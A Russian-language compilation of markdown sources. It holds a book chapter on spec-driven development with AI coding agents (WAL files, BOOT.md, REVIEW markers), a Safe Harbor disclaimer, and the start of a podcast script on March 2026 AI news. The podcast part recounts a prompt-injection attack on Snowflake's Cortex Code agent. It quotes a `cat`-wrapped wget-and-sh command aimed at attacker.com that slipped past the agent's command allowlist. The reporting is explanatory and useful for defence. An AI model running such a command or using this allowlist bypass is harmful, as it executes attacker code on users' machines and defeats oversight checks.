Иерархию приоритетов мы установили в первой главе (человек → спека → тесты → код). Здесь я хочу развернуть не *что* решает конфликт, а *как* протокол работает на практике.

Конкретный протокол для AI, когда он считает, что спека ошибочна:

1. Реализует то, что написано в спеке (спека побеждает).
2. Добавляет REVIEW-маркер: `<!-- REVIEW: §5.3 could benefit from exponential backoff instead of fixed timeout, because [reason] -->`.
3. Сообщает человеку в отчёте: «Я реализовал фиксированный таймаут, как в спеке, но предлагаю рассмотреть exponential backoff — см. REVIEW в PROP-001§5.3».
4. Человек решает в следующем цикле.

Три строки текста. Секунды на написание. Минута на чтение.

А вот стоимость *отсутствия* протокола. Рассмотрим сценарий:

AI молча меняет таймаут с 600s на 300s, потому что «так надёжнее». Человек этого не замечает — diff длинный, изменение мелкое. Через неделю другая сессия AI видит в коде 300s, а в спеке 600s. Нет информации, кто прав. AI решает, что код правильнее (он новее!), и обновляет спеку. Теперь спека говорит 300s. Ещё через неделю человек вспоминает, что таймаут должен быть 600s (потому что при 300s пользователи на медленных соединениях получают ложные TIMEOUT). Открывает спеку — а там 300s. Меняет на 600s. Но в коде уже есть логика, завязанная на 300s. Один баг превратился в три, и для их исправления нужно разбирать историю git на две недели назад.

Всё это — из-за одного молчаливого изменения без протокола. По сути, перед нами *data race* из concurrent programming, только на уровне файлов, а не ячеек памяти.

### Видимость изменений

Четвёртое требование, которое часто забывают. Мало записать изменение — нужно, чтобы оба процесса его *увидели*.

Проблема: если человек обновил спеку утром, а AI в следующей сессии прочитал *старую* версию — AI работает со старыми данными. Это типичная, частая ошибка.

Как это происходит:

**Кэш в контексте.** AI прочитал спеку в начале сессии. Человек через 15 минут обновляет спеку (в другом окне, в IDE). AI продолжает работать с той версией, которую прочитал. Изменение *невидимо* для AI до конца сессии.

**Кэш в «памяти» модели.** AI обучен на огромном корпусе данных. Иногда он «помнит» API старой версии библиотеки, хотя в спеке указана новая. Не совсем кэш, но эффект тот же.

**Кэш в голове человека.** Человек тоже кэширует. Он «помнит», что таймаут — 300s, хотя вчера сам обновил спеку на 600s. Утром не перечитал WAL — и теперь указывает AI на несуществующую ошибку.

Решения:

Для AI: **каждая сессия начинается с чтения свежего состояния**. Boot sequence из BOOT.md не случайно требует читать WAL первым делом — это инвалидация кэша.

Для человека: **утренняя рутина**. Открой WAL. Прочитай. Всё ли соответствует тому, что ты помнишь? Запусти spec-lint. Пять минут, которые предотвращают часы бессмысленных споров с нейросетью.

Для обоих: **Git diff как сигнал об инвалидации**. После каждой сессии AI обновляет WAL и спеки. Человек видит diff в Git. Diff — это *notification*: «эти данные изменились, твой кэш устарел».

## Три уровня файлового IPC

В первой главе мы обозначили три уровня: управляющие файлы, артефакты, сигналы. Здесь — конкретика по каждому: что именно лежит на каждом уровне, какие к нему требования, и как с ним работать.

### Уровень 1: Управляющие файлы (control plane)

Файлы, которые *направляют* поведение AI. Аналог управляющих сигналов в процессоре.

**BOOT.md** — точка входа. Каждая сессия начинается с него. Аналог BIOS: минимальный набор инструкций, достаточный для того, чтобы загрузить всё остальное. Он должен быть *коротким* — не более 500 токенов. Потому что он загружается *каждую* сессию, и каждый лишний токен — это налог, умноженный на количество сессий за весь проект.

> Грубое правило: для английского текста 1 токен ≈ ¾ слова, то есть 500 токенов — это примерно 375 слов, или около одной страницы обычного текста. Для русского текста токены «дороже», потому что кириллица кодируется менее эффективно — один русский токен в среднем покрывает меньше символов Поэтому 500 токенов на русском — это ориентировочно 200–250 слов, примерно полстраницы–страница Точное число зависит от конкретного токенизатора (GPT, Claude, LLaMA используют разные) и от содержания текста — код, числа и редкие слова «съедают» больше токенов. Конкретная цифра «500» здесь и далее — это просто числовой аналог «страницы текста», который может быть больше или меньше. Обычно он имеет тенденцию разрастаться и рекомендация никогда не выполняется. С тем же успехом, можно было бы порекомендовать и 300 — но тогда все спрашивали бы про тракториста.  

> Вместо слова BOOT можно использовать любое другое, которое подходит твоей среде, например, CLAUDE.md. Или например, в CLAUDE.md можно написать, что первым делом нейросети нужно прочитать BOOT.md. Такой редирект можно прописать для всех популярных систем (Codex, Kiro, итп), и у тебя получится кроссплатформенный BOOT.md с кучей разных точек входа.

**WAL.md** — состояние продолжения сессии (continuation state, как говорят у нас в русских деревнях). Заслуживает отдельной секции, о нём ниже.

**Спецификации (PROP, FEAT)** — shared mutable state. Оба процесса читают и пишут, но с приоритетом человека. Основной канал передачи *намерений*.

Важная деталь: управляющие файлы нужно *экономить по размеру*. BOOT.md — 500 токенов. WAL — до 3000. Спека модуля — до 5000. Если спека разрастается — разбивай на подмодули. Если WAL разрастается — это сигнал, что в проекте слишком много открытых потоков и нужна приоритизация.

Про разницу между PROP и FEAT, и как вообще создавать хорошую структуру спецификации, мы поговорим позднее.

### Уровень 2: Артефакты (data plane)

Результаты работы AI, верифицируемые человеком: код, тесты, обновления спек.

Ключевое свойство: они *генерируемы*. Потеря артефакта — не катастрофа, а неудобство. Потеря спеки — катастрофа. Потеря WAL — катастрофа. Потеря файла с кодом — git reset, и AI сгенерирует новый вариант в следующей сессии.

Это контринтуитивно для программиста, который привык ценить код. Но вспомните аналогию из первой главы: вы не оплакиваете бинарный файл при перекомпиляции. В нашей парадигме спека — исходник, код — бинарник. Относитесь соответственно.

### Уровень 3: Сигналы (signaling plane)

Механизмы уведомления одного процесса о действиях другого.

**Git diff** — главный сигнал от AI к человеку. Содержит только изменения, без повторения неизменённого контекста — bandwidth-efficient.

**REVIEW-маркеры** — сигнал от AI в спеках или коде. «Я здесь принял решение, которое может быть неочевидным. Посмотри.» Аналог interrupt в процессоре.

**Changelog в спеках** — хронологический сигнал. Позволяет человеку быстро понять, что изменилось с момента последнего чтения.

**Сломанные тесты** — автоматический сигнал о рассинхронизации. Адрес проблемы встроен прямо в тест через ссылку `Implements: spec://...`.

**Отчёт AI** — структурированный сигнал по завершении работы. Нужно относиться к таким отчетам как к структурным данным для быстрого сканирования очередной порции результатов. Это не отчёт-отписка, сделанная для галочки, типа отчёта о проделанной за год работы для CEO. Такой документ — это данные для начала следующего цикла обратной связи. Это действительно нужно прочитать глазами.

Паттерн: каждый сигнал *минимален*. Diff — не весь код. REVIEW — одна строка с причиной. Changelog — одна строка на изменение. Мы оптимизируем пропускную способность на обоих концах: AI не тратит токены на многословие, человек не тратит внимание на воду.

## Write Ahead Log

WAL подобен сохранению в видеоигре. Технически, там есть информация о прошлом. Особенно, если сохранение делалось методом записи всех событий, которые в игре происходили, в неком CQRS-стиле. Но *смысл* сохранения — не в истории, а в возможности *продолжить с того же места*.

WAL (Write-Ahead Log) — термин из мира баз данных. В PostgreSQL, SQLite WAL записывает *намерение* изменить данные до того, как данные реально изменены. Это позволяет восстановить состояние после сбоя. Мы используем WAL по тому же принципу, только «процесс, который падает» — это AI-сессия, а «сбой» — это неизбежная потеря контекста между сессиями. Каждое завершение сессии — crash. Каждое начало — recovery. 

Есть краши, которые реально являются ошибками — например, оболочка Claude Code выжрала 80G оперативной памяти и умерла вместе с агентом. Если у тебя нет WAL, единственный надежный способ продолжить работу — немного поплакать и сделать `git reset --hard HEAD`. Это актуальная проблема, каждый день в Twitter можно найти людей, оплакивающих своих упавших агентов и возносящих проклятья Дарио и Сэму лично. Всё становится еще печальней, если у тебя запущено много агентов, и несколько агентов сломались одновременно. Проблема, конечно, в технической незрелости существующих продуктов. Но предлагаемый паттерн позволяет немного уменьшить боль, ужас и панику.

Интересное наблюдение: этот паттерн конвергентно появляется у разных практиков под разными именами. Addy Osmani из Google описал **Automated Decision Logs** — файлы `ai_decisions.log`, фиксирующие reasoning за каждым изменением. В UX-дизайне AI-агентов формируется паттерн **Intent Preview** — агент показывает план действий перед выполнением, что по сути является тем же WAL: «записать намерение, получить подтверждение, выполнить». Я не изобрел паттерн, а только дал ему имя и формализовал в виде, понятном для «классического» разработчика, который что-то знает о базах данных.

Отсюда ключевое требование к WAL: **он должен содержать всё, что нужно следующей сессии, чтобы продолжить работу без потери качества**. Не «что было сделано» (это в Git). Не «как идут дела» (это отчёт). А конкретно: какой файл открыть, какую команду запустить, какой пункт спеки реализовать следующим, какие грабли известны, какие решения ожидают одобрения.

Вот WAL, который *бесполезен*:

```markdown
## What was done
- Worked on OPROTO verification
- Fixed some bugs
- Updated tests

## Next
- Continue working on verification
```

Представьте, что вы — новый разработчик, который пришёл на место предыдущего. Что вы узнали из этого WAL? «Кто-то над чем-то работал.» Спасибо, очень помогает.

Вот WAL, который *работает*:

```markdown
## Current Phase
PROP-001: OPROTO Message Verification — IN PROGRESS

## Completed
- PROP-000 (Foundational decisions): COMPLETE
- PROP-001§1-4 (transport, message types, format, security): COMPLETE
  All tests pass: cargo test -p oproto-core

## In Progress
- PROP-001§5 (Verification flow):
  - DONE: hash matcher (spec://oproto/PROP-001#verification.normal)
    File: crates/oproto-core/src/verify.rs, fn match_by_hash()
  - DONE: basic timeout (spec://oproto/PROP-001#verification.timeout)
    Uses 600s constant, configured in config.rs
  - TODO: degraded mode (spec://oproto/PROP-001#verification.degraded)
  - TODO: mismatch detection (spec://oproto/PROP-001#verification.mismatch)

## Known Issues
1. grammers reconnection after network loss: not handled
   Affects: crates/otg-core/src/telegram.rs line ~120
2. protobuf schema for MediaRef: edge_url field semantics unclear

## Decisions Pending
- spec://oproto/PROP-001#verification.mismatch: what if edge has 
  message that Telegram never received? Need human decision.

## Session Context
Start: read spec://oproto/PROP-001#verification.degraded
Key files: crates/oproto-core/src/verify.rs, crates/otg-core/src/telegram.rs
Run first: cargo test -p oproto-core
Watch out: do NOT touch match_by_hash() — it's tested and stable
```

Следующая сессия AI читает это и *знает*: что делать, где делать, что не трогать, какие тесты запустить, какие решения отложены. Ноль угадывания.

Обратите внимание на строку «Watch out: do NOT touch match_by_hash()». Это *анти-инструкция*: не что делать, а что *не* делать. Такие строки чрезвычайно ценны, потому что защищают от типичного AI-поведения: «о, я вижу функцию, которую можно улучшить» → «улучшение» ломает то, что уже работает.

### Протокол работы с WAL

WAL обновляется в трёх ситуациях:

**В конце каждой сессии — без исключений.** Если сессия прервалась аварийно (переполнение контекста, сбой) — человек обновляет WAL вручную, по памяти. WAL никогда не должен описывать состояние, которого уже нет.

**Перед деструктивной операцией.** Если AI собирается рефакторить что-то значительное — сначала обновить WAL. Это checkpoint, точка восстановления.

**При переключении контекста.** Если человек посреди сессии перенаправляет AI на другой модуль — обновить WAL для текущего модуля, прежде чем переключаться.

WAL должен оставаться *маленьким* — до 3000 токенов. Завершённые элементы *коллапсируют*: было пять строк с деталями реализации, стало одна строка «PROP-001§5.1: COMPLETE, all tests pass». Детали — в Git, не в WAL.

### WAL и человек

WAL пишет AI, но *верифицирует* человек. AI может написать «PROP-001§5.1: COMPLETE» — а на самом деле edge case с конкурентной верификацией не покрыт тестом. AI не врёт — он искренне считает, что всё готово. Но его определение «complete» может не совпадать с человеческим.

Утренняя рутина начинается с WAL. Не с кода, не с почты. Прочитай. Совпадает ли с тем, что помнишь? Если помнишь, что вчера тест на timeout был flaky — а WAL говорит «all tests pass» — поправь, прежде чем запускать новую сессию.

Голова человека — persistent memory. WAL — volatile (перезаписывается каждую сессию). Когда они расходятся — побеждает голова, потому что голова *старше* и содержит контекст, который WAL не фиксирует: интуицию, ощущение «что-то не так», переговоры с пользователями, решения, принятые за кофе.

## Практическая структура файлов

Теория хороша, но давайте посмотрим на конкретную структуру проекта:

```
project/
├── specs/                     # IPC-буфер (shared state)
│   ├── BOOT.md                # BIOS — точка входа AI
│   ├── WAL.md                 # Continuation state
│   ├── WAL-PROTOCOL.md        # Как работать с WAL (алгоритмический)
│   ├── SPEC-PROTOCOL.md       # Как обновлять спеки (протокол конфликтов)
│   ├── common/
│   │   ├── main.md            # Архитектура, стек, решения
│   │   ├── structure.md       # Карта модулей
│   │   └── PROP-000.md        # Фундаментальные решения
│   └── modules/
│       ├── oproto/            # Модуль OPROTO
│       │   ├── PROP-001.md    # Базовый протокол
│       │   └── FEAT-001.md    # Подключение к edge-серверу
│       ├── edge/              # Модуль edge-сервера
│       └── client/            # Модуль десктопного клиента
├── crates/                    # Артефакты (generated code)
├── tests/                     # Executable specs
├── tools/
│   └── spec-lint.sh           # Верификация ссылочной целостности
├── .human/                    # Буфер только для человека (AI-ignored)
│   └── shortcuts.md           # Быстрые команды для копипасты
├── .claudeignore              # Что AI не читает
└── CLAUDE.md                  # Инструкции для Claude Code
```

Обратите внимание на разделение: `specs/` — shared state для обоих; `crates/` и `tests/` — артефакты AI, верифицируемые человеком; `.human/` — private memory человека, невидимая для AI; `CLAUDE.md` — конфигурация процесса AI.

`.human/` заслуживает отдельного комментария. Это директория для заметок, которые не должны попадать в контекст AI. Почему? Каждый файл, прочитанный AI — это токены. Файл `shortcuts.md` содержит команды для копипасты типа «ты дрифтуешь, перечитай спеку». Если AI прочитает это — он потратит токены на содержимое, не имеющее отношения к задаче. Хуже того — может *среагировать*: увидит «ты дрифтуешь» и начнёт рефлексировать.

Вместо логического запрета («не читай этот файл») мы используем физическую невидимость: `.claudeignore` содержит `.human/`, и Claude Code просто не видит эту директорию. Физическая невидимость надёжнее логического запрета, как firewall надёжнее таблички «вход воспрещён».

## Как два писателя не ломают друг друга

Всё, что мы обсудили — адресуемость, атомарность, протокол конфликтов, видимость, WAL — работает вместе как одна система. Проследим полный цикл.

**Утро. Человек.**

Имеется человек-Олег. Олег открывает WAL. Читает: «PROP-001§5.1-5.2: COMPLETE, §5.3-5.4: TODO». Помнит, что вчера вечером решил поменять таймаут с 300s на 600s (пользователи с VPN через три страны не укладываются). Открывает спеку, находит `{#verification.timeout}`, меняет значение. Добавляет в changelog: «[2026-02-17] §5.3: timeout 300s → 600s, reason: VPN users need more time». Коммитит.

**Сессия с Claude Code.**

Олег пишет:

```
Реализуй degraded mode по spec://oproto/PROP-001#verification.degraded.
Контекст: с последней сессии я изменил таймаут в §5.3 — учти.
Не трогай match_by_hash(), он стабилен.
```

Claude Code читает BOOT.md → WAL → PROP-001. Видит обновлённую спеку (потому что Олег закоммитил утром — свежие файлы, не кэш). Реализует degraded mode. Использует 600s из спеки. Не трогает match_by_hash (инструкция от человека + WAL). Пишет три теста, каждый ссылается на спеку. Обнаруживает, что degraded mode требует reconnection logic, которая в Known Issues. Добавляет REVIEW. Обновляет WAL. Формирует отчёт:

```
## Changes
### Specs: no changes needed, impl matches spec
### Code: crates/oproto-core/src/verify.rs — degraded_mode_handler()
### Tests: 3 new (degraded send, degraded timeout, degraded recovery)
### Risks: REVIEW in PROP-001§5.2 — degraded recovery depends on reconnection
```

**Вечер. Человек.**

Олег смотрит diff. Один файл, три теста, WAL обновлён. Видит REVIEW — reconnection нужно решить, но не сейчас. Добавляет в WAL: «Decisions Pending: reconnection strategy». Коммитит.

30 минут. Одна задача. Ноль конфликтов.

## Что может пойти не так

Было бы нечестно описывать только happy path.

**Сбой 1: AI обновил спеку без уведомления.** Diff показывает: AI заменил «600 seconds» на «300 seconds with exponential backoff». Исправление: откати спеку (`git checkout`), оставь код. В начале следующей сессии: «Ты изменил спеку без REVIEW. Откатываю. Если считаешь, что exponential backoff лучше — добавь REVIEW, обсудим». И добавь в CLAUDE.md: «Never modify spec values without REVIEW marker».

**Сбой 2: WAL устарел.** Вчерашняя сессия завершилась аварийно (переполнение контекста), AI не успел обновить WAL. Исправление: ты — persistent memory. Посмотри `git log` и `git diff` за вчера, восстанови картину, обнови WAL вручную. Это одна из причин, почему человек *незаменим* — он является живым бэкапом для WAL.

**Сбой 3: Спека противоречит сама себе.** После двадцати итераций §2 говорит одно, §5 — другое. Исправление: перечитай спеку целиком. Найди противоречие. Реши, какая версия правильна. Это *еженедельная рутина*: полное перечитывание ключевых спек. Скучно, но необходимо — ты выполняешь роль garbage collector для shared state.

## Дальнейшее чтение

Для тех, кто хочет копать глубже в идеи этой главы:

**Про boundary objects и shared artifacts:**
Susan Leigh Star & James Griesemer, *«Institutional Ecology, 'Translations' and Boundary Objects»* (Social Studies of Science, 1989) — каноническая работа об объектах, обслуживающих коммуникацию между разными сообществами. Наши спеки — пример boundary object, как по учебнику.

- PDF (свободный доступ): <https://lchc.ucsd.edu/mca/Mail/xmcamail.2012_09.dir/pdfuaCxVBhVe5.pdf>
- SAGE/JSTOR: <https://journals.sagepub.com/doi/10.1177/030631289019003001>

**Про spec-driven development как формирующуюся практику:**
Birgitta Böckeler, *«Understanding Spec-Driven-Development: Kiro, spec-kit, and Tessl»* (martinfowler.com, октябрь 2025) — хороший обзор SDD-инструментов и таксономии (spec-first / spec-anchored / spec-as-source).

- <https://martinfowler.com/articles/exploring-gen-ai/sdd-3-tools.html>

**Про attention degradation в длинных контекстах:**
Nelson F. Liu et al., *«Lost in the Middle: How Language Models Use Long Contexts»* (TACL, 2024) — эмпирическое доказательство U-образной кривой внимания: начало и конец контекста «видны» модели, середина — нет.

- ACL Anthology: <https://aclanthology.org/2024.tacl-1.9/>
- arXiv: <https://arxiv.org/abs/2307.03172>
- MIT Press: <https://direct.mit.edu/tacl/article/doi/10.1162/tacl_a_00638/119630>

**Про WAL-паттерн и decision logs:**
Addy Osmani, *«Automated Decision Logs in AI-Assisted Coding»* (addyosmani.com, ноябрь 2024) — ближайший аналог нашего WAL под другим именем: фиксация reasoning за каждым изменением в отдельном файле.

- <https://addyosmani.com/blog/automated-decision-logs/>

**Про distributed cognition:**
Edwin Hutchins, *Cognition in the Wild* (MIT Press, 1995) — фундаментальная работа о том, как мышление распределяется между людьми и артефактами. Навигационная команда корабля — это когнитивная система, а не набор отдельных умов. Прямая аналогия с системой человек—AI.

- MIT Press: <https://mitpress.mit.edu/9780262581462/cognition-in-the-wild/>
- Страница автора: <https://pages.ucsd.edu/~ehutchins/citw.html>

**Про литературное программирование как предшественника spec-first:**
На самом деле не «литературное», а «грамотное» — но безграмотный перевод прижился сильнее. Donald Knuth, *«Literate Programming»* (The Computer Journal, 1984) — «давайте сконцентрируемся на объяснении *людям*, что мы хотим от компьютера». Программа как литературное произведение, где нарратив важнее кода. Прямой предок философии «спека — исходник, код — бинарник».

- PDF (свободный доступ): ><https://www.cs.tufts.edu/~nr/cs257/archive/literate-programming/01-knuth-lp.pdf>
- Oxford Academic: <https://academic.oup.com/comjnl/article/27/2/97/343244>
- Страница Кнута в Stanford: <https://www-cs-faculty.stanford.edu/~knuth/lp.html>


## Где реализация WAL?! Где код?!<br/>Как мне это внедрять?!

Самый простой и лучший способ — взять достаточно умный AI (например, Claude Opus) и скопипасить туда весь текст этой статьи. И попросить человечьим голосом: «пожалуйста, прочитай статью и спроектируй механизм работы WAL, который полностью соответствует описанным в статье идеям. Интегрируй автоматическое использование этого протокола в файлы спецификаций: BOOT.md, AGENTS.md, INSTRUCTIONS.md, CLAUDE.md, либо любые другие, которые ты считаешь нужным. Внимательно посмотри на специфику проекта и адаптируй WAL для нашего случая.».

Можно сделать более глобально - «пожалуйста, прочитай статью и адаптируй мой проект так, чтобы выполнялись все процедуры и идеи, которые написаны в этой статье. Если это требует какого-то большого рефакторинга, то ultrathink и напиши мне план, как мы собираемся это сделать». Будьте уверены, AI знает, как реализовать *все* принципы из этой статьи даже лучше, чем это знает автор.

Здесь можно было бы дать ссылку на какой-то репозиторий с шаблонами. Возможно, я когда-нибудь так и сделаю. Но правда в том, что действительно хороший AI (хотя бы уровня Claude Opus) намного умнее наших навечно захардкоженных шаблонных md-файлов, которые сейчас все пытаются упихать в чудовищного размера репозитории.

## Что дальше

Мы описали *как* два процесса обмениваются данными. Но остался вопрос: *что именно* стоит записывать, а что — нет? Какой формат памяти оптимален для каждого типа информации? Как устроена иерархия «голова → WAL → спеки → код» и что происходит, когда она нарушается?

Об этом — в следующей главе: «Архитектура памяти».


---
## Source: content/redbook/safeharbor.md
## Title: Safe Harbor
---

# Правило безопасной гавани<br>Safe Harbor

Это обязательный юридический раздел, который я добавляю в важные тексты и доклады. Я извиняюсь за время, потраченное вами на чтение этого раздела, но без него не обойтись.

Насколько мне известно, [Safe Harbor](https://en.wikipedia.org/wiki/Safe_harbor_(law)) как юридическая сущность имеет смысл только в США, а в российском законодательстве такой проблемы нет вообще. Тем не менее, этот текст могут читать в разных странах.

**Итак:**

Всё содержимое этого текста может быть художественным вымыслом или неправдой. Поэтому, нужно думать своей головой и не верить автору на слово. В особенности, когда речь идет о финансовых, юридических или медицинских вопросах.

Если вы пытаетесь внедрить решения и знания, полученные из этого доклада, вам стоит нанять профессионалов. Они расскажут, что стоит использовать, а что — нет.

Например, если вы после прочтения этого текста собираетесь побежать и потратить все деньги на покупку одной тысячи единиц штук GPU NVIDIA H100, одумайтесь. Правильный специалист в данном случае — [Дженсен Хуанг](https://ru.wikipedia.org/wiki/%D0%A5%D1%83%D0%B0%D0%BD%D0%B3,_%D0%94%D0%B6%D0%B5%D0%BD%D1%81%D0%B5%D0%BD), он вам подскажет куда лучше, чем какой-то рандомный Олег из интернета.

Эта книга является моим добровольным вкладом в сообщество AI-разработки, и никак не связано с деятельностью моих работодателей или общественных организаций, в которых я состою.


=================================================
# PODCAST AISLOPCAST — EPISODE SOURCES (markdown sources)
=================================================


---
## Source: content/podcast/aislopcast/004-hunter-alpha-stripe-mpp-ru.md
## Title: aislopcast #4 (ru) — Тайна Hunter Alpha / Stripe Machine Payments Protocol / AI-ревью ядра Linux
---

# AI-дайджест: неделя 19 марта 2026

## Xiaomi, три провала агентов, Stripe MPP, Anthropic vs Пентагон, Sashiko {#overview}
---

На этой неделе все новости связаны одной нитью. Нитью, которую я бы назвал так: AI-агенты перестали быть побочными инструментами и начали становиться центральными участниками всех событий.

Телефонная компания из Китая анонимно выпустила флагманскую модель, и весь мир неделю гадал — кто это. Три провала безопасности за сорок восемь часов показали, что агенты ломаются способами, которых мы раньше не видели. Stripe дал агентам кошелёк — и реанимировал HTTP-код, который ждал этого момента двадцать семь лет. Пентагон назвал Anthropic «неприемлемым риском для национальной безопасности» — и это, как ни странно, может оказаться главным событием недели для всех, кто работает с AI. А Google тихо запустил систему, которая находит баги в ядре Linux лучше людей. Написана на Rust. Названа в честь японского стежка.

Плотный выпуск. Поехали.

---

## Xiaomi Hunter Alpha — модель-инкогнито с триллионом параметров {#xiaomi-hunter-alpha}

Одиннадцатого марта на OpenRouter — маркетплейс, через который разработчики обращаются к сотням моделей по единому API, — появилась анонимная модель под именем Hunter Alpha. Без указания разработчика. OpenRouter пометил её как стелс-модель.

Она начала поедать рынок. За первый день — вышла в топ по использованию. За неделю — больше пятисот миллиардов токенов. За всё время тестирования — перевалила за триллион. Первое место на платформе. Триллион параметров, контекстное окно на миллион токенов — и никто не знает автора.

Естественно, весь китайский AI-интернет решил: это DeepSeek V4, которую ждут с февраля. Параметры совпадают. Когда Reuters протестировали чатбот, модель представилась как «китайская AI-модель, обученная преимущественно на китайском языке» и сообщила, что её knowledge cutoff — май 2025 года. Точно такой же, как у DeepSeek.

Восемнадцатого марта — раскрытие. Xiaomi. Компания, которая делает телефоны. И электромобили. В России они известны по смартфонам, в Китае Xiaomi выпускают что угодно, включая прищепки для белья. А теперь, оказывается, ещё и фронтирные языковые модели.

Модель называется MiMo-V2-Pro. Триллион параметров общих, сорок два миллиарда активных на каждый проход — разреженная архитектура Mixture-of-Experts. Контекстное окно — миллион токенов. На бенчмарках агентных задач — третье место в мире, после Claude Opus и Claude Sonnet. Ценник — примерно в пять раз дешевле Claude Sonnet.

Руководитель проекта — Луо Фули (Luo Fuli). Ей тридцать лет. На компьютерные науки поступила, по собственным словам, «случайно». Потом — магистратура по компьютерной лингвистике в Пекинском университете. Потом — Alibaba, потом — DeepSeek, где она стала одним из ключевых разработчиков DeepSeek-V2 и соавтором статьи, попавшей на обложку Nature. Одиннадцать тысяч цитирований, восемь тысяч из которых — за 2025 год. В ноябре двадцать пятого основатель Xiaomi Лэй Цзюнь переманил её. По слухам — за «десятки миллионов юаней».

Четыре месяца — от найма до фронтирной модели с триллионом параметров. Когда спросили, как так быстро, она ответила в X: «Все спрашивают, почему мы двигаемся так быстро. Я видела всё это своими глазами, когда строила DeepSeek R1».

Теперь — несколько вещей, о которых стоит поговорить отдельно.

«Тихая засада» — так это называет сама Луо Фули — мягко говоря, очень спланированное «случайное совпадение». Анонимная модель. С провоцирующим названием. С параметрами, идеально совпадающими со спекуляциями про DeepSeek V4. С тем же knowledge cutoff. Если бы Xiaomi хотела просто тихо потестировать — назвала бы модель «test-model-37b» и не стала бы писать «one trillion parameters» в описании. Но они _знали_, что рынок ждёт DeepSeek V4, и _знали_, что анонимная модель с правильными характеристиками вызовет именно эту волну хайпа. А раскрытие «нет, это не DeepSeek, это мы, телефонная компания» — максимальный медийный удар. Восхищаюсь. Одна из лучших стратегий запуска продукта в AI за последний год. Но «мы не планировали» — ну, скажем так: у них хорошая интуиция.

Дальше — уже без комплиментов. Xiaomi не говорит ни слова о том, на чём эта модель обучена. Я про железо. На каких GPU? Xiaomi — китайская компания. H100 запрещены для экспорта в Китай. H200 были заморожены до буквально этой недели. Обучить триллион параметров на чём-то нужно — и это «что-то» стоит отдельного разговора. Может быть, запасы H800, закупленные до ужесточения санкций. Может быть, облачные ресурсы через посредников. Может быть, Huawei Ascend. Ни один журналист не задал этот вопрос. VentureBeat, Reuters, South China Morning Post — все написали «trillion parameters» и пошли дальше. Как минимум, любопытно.

И третий момент — практический, для тех, кто думает попробовать бесплатный API. Xiaomi даёт неделю бесплатного доступа через пять агентных фреймворков: OpenClaw, Cline, Blackbox, OpenCode, KiloCode. На странице Hunter Alpha мелким шрифтом: «все промпты и ответы модели логируются провайдером и могут использоваться для улучшения модели». Перевод: когда вы бесплатно пользуетесь MiMo-V2-Pro для написания кода — вы не клиент. Вы — обучающие данные. Триллион токенов от реальных разработчиков, работающих с настоящим кодом в настоящих агентных фреймворках — датасет, за который другие компании платят десятки миллионов долларов. Xiaomi получает его бесплатно, и им ещё говорят спасибо. Блестящая бизнес-модель. Понимать её стоит.

И ещё одно наблюдение пошире. Луо Фули ушла из DeepSeek в Xiaomi. Кто-то из DeepSeek ушёл в Alibaba, кто-то — в ByteDance, кто-то — в Moonshot. Все эти люди несут с собой одни и те же интуиции про данные, архитектуру, рецепты обучения. Одинаковый knowledge cutoff у Xiaomi и DeepSeek — скорее всего, ни копирование, ни совпадение. Один пул из нескольких сотен элитных исследователей перетекает между компаниями. Китайская AI-индустрия — в некотором смысле один распределённый мозг, переливающийся между юридическими лицами. И именно поэтому модели из Китая начинают сходиться по качеству: их делают одни и те же люди.

Итог: телефонная компания с бюджетом электромобильного стартапа, AI-вундеркинд из DeepSeek и четыре месяца работы. Результат — модель, от которой отличить DeepSeek V4 не смогли даже эксперты. Запомните имя: Луо Фули. Мы про неё ещё услышим.

---

## Три провала агентов за 48 часов {#three-agent-failures}

Модели мощнее, контексты длиннее, цены ниже. Замечательно. Теперь поговорим о том, что происходит, когда эти прекрасные модели начинают _делать вещи_ — и делают их не так. За 17–18 марта случились три инцидента в трёх компаниях. И самое интересное — три совершенно разных типа отказа, ни один из которых не существует в мире обычного софта.

### Snowflake и потерянная память {#snowflake-lost-memory}

Snowflake выпустили Cortex Code — свой CLI-агент для работы с данными, прямой конкурент Claude Code. Второго февраля запустили. Пятого февраля — через три дня — ребята из PromptArmor уже подали ответственное раскрытие уязвимости. Три дня на дыру. Это говорит о качестве исследователей. И о качестве продукта.

Что произошло. Пользователь просит агента проанализировать GitHub-репозиторий. Агент лезет в репо, создаёт субагента для исследования файлов. Субагент находит README, а в README — prompt injection. Вредоносная инструкция. Субагент создаёт _ещё один_ субагент, который выполняет вредоносную команду — скачивает и запускает скрипт с сервера атакующего.

А дальше — самая красивая часть. Когда результаты поднимаются обратно по цепочке — от третьего агента ко второму, от второго к первому — _контекст теряется_. Факт выполнения команды не сохраняется при передаче. Главный агент, тот самый, с которым общается пользователь, бодро рапортует: «Я обнаружил вредоносную команду в репозитории! Ни в коем случае не запускайте её!»

Команда к этому моменту уже выполнена. Вложенным агентом. Две минуты назад.

Для программистов: представьте stack unwinding, при котором теряется информация о том, что деструкторы уже сработали. Вы поймали exception, но половина побочных эффектов уже произошла, а в exception message об этом ни слова. Только здесь «побочный эффект» — выполнение произвольного кода на машине пользователя с его учётными данными.

Технический механизм обхода, кстати, элементарный. Snowflake пометил `cat` как безопасную команду — её можно выполнять без подтверждения пользователя. Prompt injection заставила агента выполнить `cat < <(sh < <(wget -q0- https://attacker.com/malware))`. Process substitution. Начинается с «безопасного» `cat`, а внутри — скачивание и запуск произвольного скрипта. Проверка видит `cat` — и пропускает.

Саймон Уиллисон, когда увидел отчёт, написал: списки разрешённых команд в shell — концептуально нерабочий подход, и он не доверяет ни одному из них. Shell — Turing-complete язык. Количество способов спрятать опасную команду внутри безопасно выглядящей — бесконечно. Единственное решение — полностью изолированная песочница на уровне инфраструктуры, которую агент не может обойти.

Snowflake исправили за три с половиной недели, автоматическим обновлением. Но модель была уязвима целый месяц с пятидесятипроцентной вероятностью успеха атаки. Кто ещё нашёл эту уязвимость за месяц — и не был таким благородным — мы не знаем.

И последнее. Cortex Code — архитектурный клон Claude Code. Hooks, система разрешений, три уровня подтверждений — один в один. Snowflake написали свою обёртку поверх стандартного паттерна — и в обёртке оказалась дыра. Сколько таких обёрток существует сейчас? Десятки. Cortex Code, OpenCode, Aider, плюс внутренние инструменты в каждой второй компании. Кто проверяет _их_ обёртки? В основном — никто.

### Meta и идеальный шторм {#meta-perfect-storm}

У Meta есть AI-агент для внутренней техподдержки. Инженер задал вопрос на внутреннем форуме. Другой инженер привлёк агента для анализа. Агент проанализировал, написал ответ — и опубликовал его. Без спроса. Просто взял и выложил.

